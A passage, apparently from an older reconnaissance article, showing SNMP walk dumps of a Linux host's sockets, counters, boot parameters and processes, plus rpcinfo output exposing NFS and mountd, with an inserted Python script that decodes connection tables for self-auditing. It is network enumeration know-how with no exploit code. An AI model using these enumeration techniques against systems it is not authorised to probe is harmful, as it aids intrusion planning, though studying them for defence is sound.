udp.udpTable.udpEntry.udpLocalPort.127.0.0.1.53 = INTEGER: 53
udp.udpTable.udpEntry.udpLocalPort.12.32.42.193.53 = INTEGER: 53
udp.udpTable.udpEntry.udpLocalPort.14.11.15.193.53 = INTEGER: 53

 <[ UDP listening sockets ]>
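
Added example (not part of the original article): a Python sketch that an administrator auditing their own agent could use to decode the tcpConnTable and udpTable indexes shown above into listeners and peers, making visible what a readable community string discloses. The sample lines are constructed and use documentation addresses; all function names are assumptions of this example.

```python
import re
from collections import namedtuple

TcpConn = namedtuple("TcpConn", "local_addr local_port rem_addr rem_port state")

# tcpConnState index = local IP (4 sub-ids), local port, remote IP (4 sub-ids), remote port
TCP_RE = re.compile(r"tcpConnState\.((?:\d+\.){9}\d+)\s*=\s*INTEGER:\s*(\w+)\(\d+\)")
# udpLocalPort index = local IP (4 sub-ids), local port
UDP_RE = re.compile(r"udpLocalPort\.((?:\d+\.){4}\d+)\s*=\s*INTEGER:\s*\d+")

# Constructed sample in the same symbolic snmpwalk format as the dump above.
# The last tcpConnState line is deliberately malformed (octet 999).
SAMPLE = """\
tcp.tcpConnTable.tcpConnEntry.tcpConnState.0.0.0.0.22.0.0.0.0.0 = INTEGER: listen(2)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.0.0.0.0.3128.0.0.0.0.0 = INTEGER: listen(2)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.127.0.0.1.53.0.0.0.0.0 = INTEGER: listen(2)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.192.0.2.1.22.192.0.2.50.1023 = INTEGER: established(5)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.192.0.2.1.3128.198.51.100.7.1517 = INTEGER: timeWait(11)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.0.0.0.999.22.0.0.0.0.0 = INTEGER: listen(2)
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.0.0.0.0.22.0.0.0.0.0 = INTEGER: 22
udp.udpTable.udpEntry.udpLocalPort.0.0.0.0.161 = INTEGER: 161
udp.udpTable.udpEntry.udpLocalPort.127.0.0.1.53 = INTEGER: 53
"""


def _split_endpoint(ids):
    """Turn 5 sub-identifiers into (dotted address, port); None if out of range."""
    octets, port = ids[:4], ids[4]
    if any(o > 255 for o in octets) or port > 65535:
        return None
    return ".".join(map(str, octets)), port


def parse_tcp_conns(text):
    """Decode every well-formed tcpConnState row into a TcpConn tuple."""
    conns = []
    for m in TCP_RE.finditer(text):
        ids = [int(x) for x in m.group(1).split(".")]
        local, remote = _split_endpoint(ids[:5]), _split_endpoint(ids[5:])
        if local and remote:  # skip rows whose index is not a valid endpoint pair
            conns.append(TcpConn(*local, *remote, m.group(2)))
    return conns


def parse_udp_listeners(text):
    """Decode every well-formed udpLocalPort row into (address, port)."""
    out = []
    for m in UDP_RE.finditer(text):
        ep = _split_endpoint([int(x) for x in m.group(1).split(".")])
        if ep:
            out.append(ep)
    return out


def exposure_report(text):
    """Summarise what the walk reveals: services, loopback-only services, peers."""
    conns = parse_tcp_conns(text)
    listeners = [c for c in conns if c.state == "listen"]
    reachable = {c.local_port for c in listeners
                 if not c.local_addr.startswith("127.")}
    loopback = {c.local_port for c in listeners
                if c.local_addr.startswith("127.")} - reachable
    peers = {c.rem_addr for c in conns
             if c.state != "listen" and not c.rem_addr.startswith("127.")}
    udp = {port for addr, port in parse_udp_listeners(text)
           if not addr.startswith("127.")}
    return {
        "tcp_reachable": sorted(reachable),      # bound to wildcard or a real address
        "tcp_loopback_only": sorted(loopback),   # invisible to a scan, visible via SNMP
        "peers": sorted(peers),                  # remote hosts the box talks to
        "udp_reachable": sorted(udp),
    }


if __name__ == "__main__":
    for key, value in exposure_report(SAMPLE).items():
        print(f"{key}: {value}")
```

The loopback-only and peer lists are the part a network scan from outside would never show, which is why read access to these tables should be limited with a non-default community string, a restricted view, or source-address filtering on the agent.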

snmp.snmpInPkts.0 = Counter: 1048422
snmp.snmpOutPkts.0 = Counter: 1048421
snmp.snmpInBadVersions.0 = Counter: 0
snmp.snmpInBadCommunityNames.0 = Counter: 0
snmp.snmpInBadCommunityUses.0 = Counter: 0
snmp.snmpInASNParseErrs.0 = Counter: 0
snmp.snmpInTooBigs.0 = Counter: 0
snmp.snmpInNoSuchNames.0 = Counter: 0
snmp.snmpInBadValues.0 = Counter: 0
snmp.snmpInReadOnlys.0 = Counter: 0
snmp.snmpInGenErrs.0 = Counter: 0
snmp.snmpInTotalReqVars.0 = Counter: 1048433
snmp.snmpInTotalSetVars.0 = Counter: 0
snmp.snmpInGetRequests.0 = Counter: 8487
snmp.snmpInGetNexts.0 = Counter: 1039949
snmp.snmpInSetRequests.0 = Counter: 0
snmp.snmpInGetResponses.0 = Counter: 0
snmp.snmpInTraps.0 = Counter: 0
snmp.snmpOutTooBigs.0 = Counter: 0
snmp.snmpOutNoSuchNames.0 = Counter: 0
snmp.snmpOutBadValues.0 = Counter: 0
snmp.snmpOutGenErrs.0 = Counter: 0
snmp.snmpOutGetRequests.0 = Counter: 0
snmp.snmpOutGetNexts.0 = Counter: 0
snmp.snmpOutSetRequests.0 = Counter: 0
snmp.snmpOutGetResponses.0 = Counter: 0
snmp.snmpOutTraps.0 = Counter: 0
snmp.snmpEnableAuthenTraps.0 = INTEGER: disabled(2)

 <[ statistics for SNMP itself ]>

host.hrSystem.hrSystemUptime.0 = Timeticks: (42427609) 4 days, 21:51:16
host.hrSystem.hrSystemDate.0 = OCTET STRING:  Hex: 00 63 07 10 0E 37 1B 00
host.hrSystem.hrSystemInitialLoadDevice.0 = INTEGER: 770
host.hrSystem.hrSystemInitialLoadParameters.0 = OCTET STRING: "auto BOOT_IMAGE=linux2210 ro root=302 BOOT_FILE=/linux2.2.10 digi=E,PC/Xe,D,8,110,D8000"
host.hrSystem.hrSystemNumUsers.0 = Gauge: 7
host.hrSystem.hrSystemProcesses.0 = Gauge: 74
host.hrSystem.hrSystemMaxProcesses.0 = INTEGER: 512
host.hrStorage.hrMemorySize.0 = INTEGER: 65536
host.hrStorage.hrStorageTable.hrStorageEntry.hrStorageIndex.1 = INTEGER: 1
host.hrStorage.hrStorageTable.hrStorageEntry.hrStorageIndex.2 = INTEGER: 2
host.hrStorage.hrStorageTable.hrStorageEntry.hrStorageIndex.770 = INTEGER: 770
host.hrStorage.hrStorageTable.hrStorageEntry.hrStorageType.1 = OBJECT IDENTIFIER: host.hrStorage.hrStorageTypes.hrStorageRam
host.hrStorage.hrStorageTable.hrStorageEntry.hrStorageType.2 = OBJECT IDENTIFIER: host.hrStorage.hrStorageTypes.hrStorageVirtualMemory
host.hrStorage.hrStorageTable.hrStorageEntry.hrStorageType.770 = OBJECT IDENTIFIER: host.hrStorage.hrStorageTypes.hrStorageFixedDisk
host.hrStorage.hrStorageTable.hrStorageEntry.hrStorageDescr.1 = OCTET STRING: "Mem" Hex: 4D 65 6D
host.hrStorage.hrStorageTable.hrStorageEntry.hrStorageDescr.2 = OCTET STRING: "Swap" Hex: 53 77 61 70
host.hrStorage.hrStorageTable.hrStorageEntry.hrStorageDescr.770 = OCTET STRING: "Disk" Hex: 44 69 73 6B
host.hrStorage.hrStorageTable.hrStorageEntry.hrStorageAllocationUnits.1 = INTEGER: 1024
host.hrStorage.hrStorageTable.hrStorageEntry.hrStorageAllocationUnits.2 = INTEGER: 1024
host.hrStorage.hrStorageTable.hrStorageEntry.hrStorageAllocationUnits.770 = INTEGER: 1024
host.hrStorage.hrStorageTable.hrStorageEntry.hrStorageSize.1 = INTEGER: 63128
host.hrStorage.hrStorageTable.hrStorageEntry.hrStorageSize.2 = INTEGER: 64224
host.hrStorage.hrStorageTable.hrStorageEntry.hrStorageSize.770 = INTEGER: 4005619
host.hrStorage.hrStorageTable.hrStorageEntry.hrStorageUsed.1 = INTEGER: 58796
host.hrStorage.hrStorageTable.hrStorageEntry.hrStorageUsed.2 = INTEGER: 19980
host.hrStorage.hrStorageTable.hrStorageEntry.hrStorageUsed.770 = INTEGER: 1349015
host.hrStorage.hrStorageTable.hrStorageEntry.hrStorageAllocationFailures.1 = Counter: 0
host.hrStorage.hrStorageTable.hrStorageEntry.hrStorageAllocationFailures.2 = Counter: 0
host.hrStorage.hrStorageTable.hrStorageEntry.hrStorageAllocationFailures.770 = Counter: 0
host.hrDevice.hrDeviceTable.hrDeviceEntry.hrDeviceIndex.1 = INTEGER: 1
host.hrDevice.hrDeviceTable.hrDeviceEntry.hrDeviceType.1 = OBJECT IDENTIFIER: host.hrDevice.hrDeviceTypes.hrDeviceProcessor
host.hrDevice.hrDeviceTable.hrDeviceEntry.hrDeviceDescr.1 = OCTET STRING: "vendor_id: GenuineIntel, cpu family: 5"
host.hrDevice.hrDeviceTable.hrDeviceEntry.hrDeviceID.1 = OBJECT IDENTIFIER: .ccitt.0
host.hrDevice.hrDeviceTable.hrDeviceEntry.hrDeviceStatus.1 = INTEGER: running(2)
host.hrDevice.hrDeviceTable.hrDeviceEntry.hrDeviceErrors.1 = Counter: 0
host.hrDevice.hrProcessorTable.hrProcessorEntry.hrProcessorFrwID.1 = OBJECT IDENTIFIER: .ccitt.0
host.hrDevice.hrProcessorTable.hrProcessorEntry.hrProcessorLoad.1 = INTEGER: 2
host.hrDevice.hrFSTable.hrFSEntry.hrFSIndex.770 = INTEGER: 770
host.hrDevice.hrFSTable.hrFSEntry.hrFSMountPoint.770 = OCTET STRING: "/dev/hda2"
host.hrDevice.hrFSTable.hrFSEntry.hrFSRemoteMountPoint.770 = OCTET STRING: "/" Hex: 2F
host.hrDevice.hrFSTable.hrFSEntry.hrFSType.770 = OBJECT IDENTIFIER: host.hrDevice.hrFSTypes.hrFSUnknown
host.hrDevice.hrFSTable.hrFSEntry.hrFSAccess.770 = INTEGER: readWrite(1)
host.hrDevice.hrFSTable.hrFSEntry.hrFSBootable.770 = INTEGER: true(1)
host.hrDevice.hrFSTable.hrFSEntry.hrFSStorageIndex.770 = INTEGER: 770
host.hrDevice.hrFSTable.hrFSEntry.hrFSLastFullBackupDate.770 = OCTET STRING:  Hex: 00 00 01 01 00 00 00 00
host.hrDevice.hrFSTable.hrFSEntry.hrFSLastPartialBackupDate.770 = OCTET STRING:  Hex: 00 00 01 01 00 00 00 00
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.0 = INTEGER: 0
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.1 = INTEGER: 487
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.2 = INTEGER: 143
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.3 = INTEGER: 0
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.4 = INTEGER: 294
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.13 = INTEGER: 253
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.185 = INTEGER: 2586
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.187 = INTEGER: 1
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.194 = INTEGER: 0
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.198 = INTEGER: 0
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.200 = INTEGER: 541
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.203 = INTEGER: 1444
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.209 = INTEGER: 0
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.216 = INTEGER: 329
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.220 = INTEGER: 32132
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.231 = INTEGER: 22
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.236 = INTEGER: 8
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.331 = INTEGER: 2708
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.1801 = INTEGER: 1
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.1802 = INTEGER: 6361
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.1803 = INTEGER: 1
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.1804 = INTEGER: 24
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.1805 = INTEGER: 18
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.1806 = INTEGER: 22
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.1807 = INTEGER: 26
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.1808 = INTEGER: 30
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.1809 = INTEGER: 23
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.1810 = INTEGER: 36
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.1811 = INTEGER: 34
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.1812 = INTEGER: 25
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.1813 = INTEGER: 37
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.1814 = INTEGER: 29
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.1815 = INTEGER: 24
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.1816 = INTEGER: 29
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.1817 = INTEGER: 29
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.1818 = INTEGER: 23
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.1819 = INTEGER: 28
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.2726 = INTEGER: 3
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.2727 = INTEGER: 2
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.2728 = INTEGER: 0
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.11969 = INTEGER: 5
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.13050 = INTEGER: 1
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.13051 = INTEGER: 4
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.13052 = INTEGER: 4
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.13506 = INTEGER: 16
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.13521 = INTEGER: 3
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.13872 = INTEGER: 9
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.13873 = INTEGER: 2
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.13874 = INTEGER: 2
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.13875 = INTEGER: 2
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.13876 = INTEGER: 2
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.13877 = INTEGER: 2
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.13878 = INTEGER: 2
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.16256 = INTEGER: 3
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.16748 = INTEGER: 23
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.16750 = INTEGER: 13
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.16892 = INTEGER: 4
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.16906 = INTEGER: 2
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.17039 = INTEGER: 3
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.18234 = INTEGER: 2
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.19270 = INTEGER: 0
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.19271 = INTEGER: 0
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.20317 = INTEGER: 16
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.20318 = INTEGER: 2
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.20319 = INTEGER: 4
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.20321 = INTEGER: 1
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.20933 = INTEGER: 6
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.23404 = INTEGER: 7
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.23405 = INTEGER: 1
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.23407 = INTEGER: 2
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.23408 = INTEGER: 1
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.25643 = INTEGER: 1
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.26507 = INTEGER: 1707
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.29233 = INTEGER: 3
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.30685 = INTEGER: 3
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.0 = INTEGER: 0
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.1 = INTEGER: 124
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.2 = INTEGER: 0
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.3 = INTEGER: 0
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.4 = INTEGER: 0
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.13 = INTEGER: 28
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.185 = INTEGER: 212
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.187 = INTEGER: 0
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.194 = INTEGER: 52
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.198 = INTEGER: 320
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.200 = INTEGER: 72
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.203 = INTEGER: 1468
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.209 = INTEGER: 0
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.216 = INTEGER: 340
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.220 = INTEGER: 1900
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.231 = INTEGER: 164
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.236 = INTEGER: 72
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.331 = INTEGER: 1188
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.1801 = INTEGER: 0
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.1802 = INTEGER: 23120
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.1803 = INTEGER: 23120
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.1804 = INTEGER: 23120
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.1805 = INTEGER: 23120
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.1806 = INTEGER: 23120
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.1807 = INTEGER: 23120
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.1808 = INTEGER: 23120
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.1809 = INTEGER: 23120
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.1810 = INTEGER: 23120
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.1811 = INTEGER: 23120
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.1812 = INTEGER: 23120
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.1813 = INTEGER: 23120
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.1814 = INTEGER: 23120
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.1815 = INTEGER: 23120
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.1816 = INTEGER: 23120
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.1817 = INTEGER: 23120
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.1818 = INTEGER: 23120
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.1819 = INTEGER: 23120
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.2726 = INTEGER: 768
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.2727 = INTEGER: 836
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.2728 = INTEGER: 844
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.11969 = INTEGER: 920
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.13050 = INTEGER: 916
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.13051 = INTEGER: 916
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.13052 = INTEGER: 920
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.13506 = INTEGER: 844
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.13521 = INTEGER: 588
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.13872 = INTEGER: 508
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.13873 = INTEGER: 504
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.13874 = INTEGER: 496
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.13875 = INTEGER: 396
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.13876 = INTEGER: 396
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.13877 = INTEGER: 396
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.13878 = INTEGER: 396
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.16256 = INTEGER: 568
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.16748 = INTEGER: 1072
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.16750 = INTEGER: 1200
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.16892 = INTEGER: 568
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.16906 = INTEGER: 568
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.17039 = INTEGER: 568
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.18234 = INTEGER: 776
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.19270 = INTEGER: 0
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.19271 = INTEGER: 0
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.20317 = INTEGER: 0
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.20318 = INTEGER: 0
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.20319 = INTEGER: 0
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.20321 = INTEGER: 0
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.20933 = INTEGER: 104
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.23404 = INTEGER: 0
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.23405 = INTEGER: 0
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.23407 = INTEGER: 0
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.23408 = INTEGER: 0
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.25643 = INTEGER: 0
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.26507 = INTEGER: 344
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.29233 = INTEGER: 0
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.30685 = INTEGER: 560

 <[ various data about the host....... ]>

     1.8. rpcinfo - various RPC services, NFS.

 Here is sample output from rpcinfo -p <host>

   program vers proto   port
    100000    2   tcp    111  portmapper
    100000    2   udp    111  portmapper
    100003    2   udp   2049  nfs
    100003    2   tcp   2049  nfs
    100005    1   udp    944  mountd
    100005    2   udp    944  mountd
    100005    1   tcp    947  mountd
    100005    2   tcp    947  mountd

 <[  This machine has nfs and mountd running, i.e. various directories can be
 used from it, depending on the exports ]>

   program vers proto   port
    100000    2   tcp    111  portmapper
    100000    2   udp    111  portmapper
    100021    1   udp   2173  nlockmgr
    100021    3   udp   2173  nlockmgr
    100021    1   tcp   3046  nlockmgr
    100021    3   tcp   3046  nlockmgr

 <[  and this is another machine, which does not have nfsd itself, only lockd
 - the lock manager for NFS. ]>

 And this is the output of rpcinfo when there is no RPC on the remote machine.
rpcinfo: can't contact portmapper: RPC: Remote system error - Connection refused
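
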